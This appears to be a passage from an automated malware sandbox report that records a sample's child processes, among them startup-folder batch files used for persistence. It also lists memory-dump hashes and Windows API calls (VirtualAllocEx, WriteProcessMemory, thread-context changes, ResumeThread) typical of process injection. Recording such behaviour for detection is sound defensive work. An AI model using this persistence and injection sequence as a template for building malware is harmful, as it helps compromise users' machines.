                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aZULhs3yjKzrM4jdcsdY0pG.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:21
                                                Start time:17:02:07
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:17:02:15
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bPdKjWiyihutETqOInbK2Mh7.bat" "
                                                Imagebase:0x7ff7d1ec0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:23
                                                Start time:17:02:15
                                                Start date:09/08/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true


                                                  Execution Graph

                                                  Execution Coverage:18.2%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:9.4%
                                                  Total number of Nodes:96
                                                  Total number of Limit Nodes:6

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649034695.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7310000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649034695.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7310000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648869261.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7220000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Q+(i$Q+(i
                                                  • API String ID: 0-3998099878

                                                  Control-flow Graph

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Q!$Q!
                                                  • API String ID: 0-2963764794

                                                  Control-flow Graph

                                                  APIs
                                                  • CreateProcessAsUserW.KERNELBASE(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 0918B633
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: CreateProcessUser
                                                  • String ID:
                                                  • API String ID: 2217836671-0

                                                  Control-flow Graph

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0732BFDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Q!
                                                  • API String ID: 0-1344094416
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: <
                                                  • API String ID: 0-4251816714
                                                  • Opcode ID: a89e95f09a5b4d2c7be7d5b493891045402809a29302d37dbe705fce0110dcfe
                                                  • Instruction ID: 80de34397a0feb6c07949e54e6e43e061487c91cafa4716aa1b821c4050f0ff8
                                                  • Opcode Fuzzy Hash: a89e95f09a5b4d2c7be7d5b493891045402809a29302d37dbe705fce0110dcfe
                                                  • Instruction Fuzzy Hash: 136178B5E01658CFDB58CFAAC9446DDFBF2AF89300F14D0AAD409AB225DB345A85CF50
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630119771.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d20000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7515b3f4682afd3d128ae1ba28b6b367e9e32cd6b4913997a3fa0a3448fc80f1
                                                  • Instruction ID: 1385428543e0bb506b65b9c3670fc6d30c843755df98f7dbc65085febd4436df
                                                  • Opcode Fuzzy Hash: 7515b3f4682afd3d128ae1ba28b6b367e9e32cd6b4913997a3fa0a3448fc80f1
                                                  • Instruction Fuzzy Hash: 9A924B74A002199FCB14CF6CE984AAABBF2FF58318F198555E409DB2A1D734EC81CB61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648003539.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e70000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7d433332f4c5f39796d6a078c3646493861923d9712b335a8ac4b793076d4963
                                                  • Instruction ID: 9c493199401af7a2c3bbc12a9d4e1225a1d2638fab24b352acab2e2016e6dd68
                                                  • Opcode Fuzzy Hash: 7d433332f4c5f39796d6a078c3646493861923d9712b335a8ac4b793076d4963
                                                  • Instruction Fuzzy Hash: 3272BF717002088FEB18EB78C858A6E7BA7FFC8350F158569E15ADB3A5DE30DD068791
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630119771.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_d20000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 32b1d16c6dee0e40a7ec65df5a420bf31bc182a38c42f50f5186400db6c4cdbd
                                                  • Instruction ID: e4c75cdc9fccf202aff7de5b0fffb1c7a729ab3580825e9ef060aca923f99726
                                                  • Opcode Fuzzy Hash: 32b1d16c6dee0e40a7ec65df5a420bf31bc182a38c42f50f5186400db6c4cdbd
                                                  • Instruction Fuzzy Hash: BD727C71A00219DFDB14DF69D994AAEBBF6FF98304F148169E805AB391DB30DC41CBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648003539.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e70000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 737c986f523554813f2c8d1dec62d07f6791e729e849a8990192a3c988b73ac4
                                                  • Instruction ID: 88c96a5d6bd69be3f2a3cbc2c892f3661ef8b17f673e9a9608a55f309e8e35a3
                                                  • Opcode Fuzzy Hash: 737c986f523554813f2c8d1dec62d07f6791e729e849a8990192a3c988b73ac4
                                                  • Instruction Fuzzy Hash: F0526F34A0035ACFDB14DF68C844B98B7B2FF85314F2582A9D5586F3A2DB71A986CF40
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648003539.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e70000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 049c3b2f26c930fd52bf671bb4e0610d116e11fb8332767fb20b2ff8ca641b41
                                                  • Instruction ID: cad3073589b42ce5685e0c1cfbf0028874b198f5aa9cb33582002b31264a6e69
                                                  • Opcode Fuzzy Hash: 049c3b2f26c930fd52bf671bb4e0610d116e11fb8332767fb20b2ff8ca641b41
                                                  • Instruction Fuzzy Hash: 04526034A0035ACFDB14DF68C844B98B7B2FF85314F1582A9D5586F3A2DB71A986CF81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648869261.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7220000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b2ba9dea842405eeb94cf228386dee6838aa57b02a2355e88fa907bf82662cba
                                                  • Instruction ID: 16b1be3abca70556a8b78bcae8f492ce0d2cb206478e0326581c958b8aa2c998
                                                  • Opcode Fuzzy Hash: b2ba9dea842405eeb94cf228386dee6838aa57b02a2355e88fa907bf82662cba
                                                  • Instruction Fuzzy Hash: E8B1DAF0B3422BDBDB281F35945433A77A6AFC1A41F28491ED886D615CEE70C843EB55
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 43ad0bc4fe58c4e1d1ac7849c21c71b787d5c8e6f980f0818bb9a350a9fa4d2c
                                                  • Instruction ID: 2aebcb7bf5766304d6dbb981f2bfb8584c2137b53387a60fcb13c099a37ca438
                                                  • Opcode Fuzzy Hash: 43ad0bc4fe58c4e1d1ac7849c21c71b787d5c8e6f980f0818bb9a350a9fa4d2c
                                                  • Instruction Fuzzy Hash: 8AC19B71B006148BDB19EF75C464B6F77E6AF89708F20846DE1469B3A0CF35E902DBA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8d2f6cde45cbacd64ce9c8f582cd65966064c4a66c875e03d75863bdfae294d7
                                                  • Instruction ID: f00d10aa42e58730a3977b4d8ad87f06c4f1bd629a05f2cfc3cf000c0b6730ba
                                                  • Opcode Fuzzy Hash: 8d2f6cde45cbacd64ce9c8f582cd65966064c4a66c875e03d75863bdfae294d7
                                                  • Instruction Fuzzy Hash: 83D1AEB1D5422ADFEB04CFA5C4868EEFBB5FF8A340B248059D449AB355D730A942DF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0314de48b943aef511c053abc4458bd6c27511db0372984de54e99409653941f
                                                  • Instruction ID: 24a1a964a85e96dbe63dc53ed145653f7ab0925b90677976ae049863db2dc016
                                                  • Opcode Fuzzy Hash: 0314de48b943aef511c053abc4458bd6c27511db0372984de54e99409653941f
                                                  • Instruction Fuzzy Hash: DFD11A75E0566ACFCB68DF25C84479EBBB6BB89384F10D5EAD40EA7214D7709E818F00
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 402e6c0ee8c2efea187ccc443b0ebce824c1810d8d953298048f9250878b0fda
                                                  • Instruction ID: ee820747879846c8e31cb66b5a5664e75f0e03f3eb929dca40c33c141d544716
                                                  • Opcode Fuzzy Hash: 402e6c0ee8c2efea187ccc443b0ebce824c1810d8d953298048f9250878b0fda
                                                  • Instruction Fuzzy Hash: 76C18BB0E5422ADFEB04CFA5C4868AEFBB6FF89340F548059D449AB355D734A942CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 268c9fbd85463e0230032f41cc83a3dd8472485cfebb8c4d677a2a5076c92d79
                                                  • Instruction ID: d829dcc7f2bfc7fcbdbc066449f7856cd419121d1342d17fdb094d8a77093cea
                                                  • Opcode Fuzzy Hash: 268c9fbd85463e0230032f41cc83a3dd8472485cfebb8c4d677a2a5076c92d79
                                                  • Instruction Fuzzy Hash: D9C17AB0D5422ADFEB04CFA5C4868AEFBB6FF89340F648059D419AB355D734A942CF90
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2deecb7fc63e737eb9409a925f1ed98e798f85a32e0fea1ea0ed05148db59a4a
                                                  • Instruction ID: e2561eaf69b109d38dd011efabd0d6676cbf699423aaa922d794c3f33a11811e
                                                  • Opcode Fuzzy Hash: 2deecb7fc63e737eb9409a925f1ed98e798f85a32e0fea1ea0ed05148db59a4a
                                                  • Instruction Fuzzy Hash: 3D71D4B5E002188FDB08CFA9D985AEEBBB2FF89300F14912AD419AB355D7345906DF51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e2d10c6bd527d9c764b56b57a060f287d1c34d1e2c2a267fe072bc38e50d2b28
                                                  • Instruction ID: 1b7fb4d8b541f07134b1384f5286d4e686daa9fe812e70bcc127f9b1196477b4
                                                  • Opcode Fuzzy Hash: e2d10c6bd527d9c764b56b57a060f287d1c34d1e2c2a267fe072bc38e50d2b28
                                                  • Instruction Fuzzy Hash: FE71C3B5E002198FDB08CFAAD984AAEFBB2FF89300F10912AD419AB354D7345906DF51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0747794b1a2c0a7c4a1751d3fa0bba6f5573a16e17aa097a5100fbe6a59d0068
                                                  • Instruction ID: ad26489573e39ab30e96b581d0b497edf6c2c68d213cfc074f130c7162927a8c
                                                  • Opcode Fuzzy Hash: 0747794b1a2c0a7c4a1751d3fa0bba6f5573a16e17aa097a5100fbe6a59d0068
                                                  • Instruction Fuzzy Hash: 9A6148B0E04219DFCB08EFA5C5896EEBBB6FF88384F10846AE416A7340DB745A05DF54
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9b7f183f6e0b9382bdf4f1444e84eab3367caca4bc8616f41945ecc0ad00eaa
                                                  • Instruction ID: e3bce16d4e423f561c5005c710f4dbb989acb215462663226d39a1496ea245e1
                                                  • Opcode Fuzzy Hash: e9b7f183f6e0b9382bdf4f1444e84eab3367caca4bc8616f41945ecc0ad00eaa
                                                  • Instruction Fuzzy Hash: 5B5130B0E18219DFEB04CF9AC4416AEFBF2EF89341F24D06AD519A7255D7348A02CF94
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d50859abd489a7ada10ad6a5f7b411e7224aa63bb91fa54e3a04a60221b460a
                                                  • Instruction ID: 8dfa4ebf8d6c6198eba1eb5cc147f654477b4af11fac8dfae6b9136ad3c624bf
                                                  • Opcode Fuzzy Hash: 2d50859abd489a7ada10ad6a5f7b411e7224aa63bb91fa54e3a04a60221b460a
                                                  • Instruction Fuzzy Hash: 80416AB0E1520A9BCF08DFA6D8416AFBBF6FB89354F10946AE511A6210D73446428FA1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3bcf9771bd14a0401df3d25e23f01b64a5252c881801c9c6c626bdc44fb8ee20
                                                  • Instruction ID: 9a0add2f2b0b097245396f9cd5147331a323410fa49eb3b13911d232d7b56cbb
                                                  • Opcode Fuzzy Hash: 3bcf9771bd14a0401df3d25e23f01b64a5252c881801c9c6c626bdc44fb8ee20
                                                  • Instruction Fuzzy Hash: DF4158B0E1520ADBDF08DFA6C8416AFFBF6FF89354F10946AE511B6210D73446428FA5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4008b753b9cdf8c751c1d61e6f8ca223f89c00cb85cfb744486ba384b8258ae
                                                  • Instruction ID: 9122bd3ee0a41446a669e8f6f4cf7966cd1f932477fef8ffca4da32132fb1b70
                                                  • Opcode Fuzzy Hash: b4008b753b9cdf8c751c1d61e6f8ca223f89c00cb85cfb744486ba384b8258ae
                                                  • Instruction Fuzzy Hash: 8F31E7B1E106288BEB28CF96D9443DEFFF6AFC9310F14C16AD409A6254DB750A4ACF50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4854 731a6e8-731a894 4879 731a896-731a8a0 4854->4879 4880 731a8a8-731a960 4854->4880 4879->4880 4892 731a962-731a965 4880->4892 4893 731a967-731a96a 4880->4893 4894 731a96d-731a980 4892->4894 4893->4894 4933 731a983 call 731ac51 4894->4933 4934 731a983 call 731c4d3 4894->4934 4897 731a989-731ab1e call 7319930 4922 731ab20-731ab3a 4897->4922 4923 731ab48-731abca 4897->4923 4935 731ab3a call 7320b58 4922->4935 4936 731ab3a call 7320b48 4922->4936 4931 731ac29-731ac43 4923->4931 4932 731abcc-731abe6 4923->4932 4930 731ab40-731ab47 4933->4897 4934->4897 4935->4930 4936->4930
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649034695.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7310000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: @
                                                  • API String ID: 0-2766056989

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4971 918d9e0-918da2e 4973 918da3e-918da7d WriteProcessMemory 4971->4973 4974 918da30-918da3c 4971->4974 4976 918da7f-918da85 4973->4976 4977 918da86-918dab6 4973->4977 4974->4973 4976->4977
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0918DA70
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4991 918e160-918e1ab 4993 918e1bb-918e1eb Wow64SetThreadContext 4991->4993 4994 918e1ad-918e1b9 4991->4994 4996 918e1ed-918e1f3 4993->4996 4997 918e1f4-918e224 4993->4997 4994->4993 4996->4997
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0918E1DE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 4981 918cf98-918cfe3 4983 918cff3-918d023 Wow64GetThreadContext 4981->4983 4984 918cfe5-918cff1 4981->4984 4986 918d02c-918d05c 4983->4986 4987 918d025-918d02b 4983->4987 4984->4983 4987->4986
                                                  APIs
                                                  • Wow64GetThreadContext.KERNEL32(?,00000000), ref: 0918D016
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  APIs
                                                  • VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 0918DF4F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0918406B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                  • DeleteFileW.KERNELBASE(00000000), ref: 072296D0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2648869261.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7220000_file.jbxd
                                                  Similarity
                                                  • API ID: DeleteFile
                                                  • String ID:
                                                  • API String ID: 4033686569-0
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0732BFDB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649092254.0000000007320000.00000040.00000800.00020000.00000000.sdmp, Offset: 07320000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7320000_file.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0918406B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0918D6D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: AllocVirtual
                                                  • String ID:
                                                  • API String ID: 4275171209-0
                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00DA0A28
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630249769.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  APIs
                                                  • PostMessageW.USER32(?,00000010,00000000,?), ref: 0918EA95
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: MessagePost
                                                  • String ID:
                                                  • API String ID: 410705778-0
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2649676094.0000000009180000.00000040.00000800.00020000.00000000.sdmp, Offset: 09180000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_9180000_file.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  APIs
                                                  • FindCloseChangeNotification.KERNELBASE(?), ref: 00DA0A28
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2630249769.0000000000DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DA0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_da0000_file.jbxd
                                                  Similarity
                                                  • API ID: ChangeCloseFindNotification
                                                  • String ID:
                                                  • API String ID: 2591292051-0
                                                  APIs
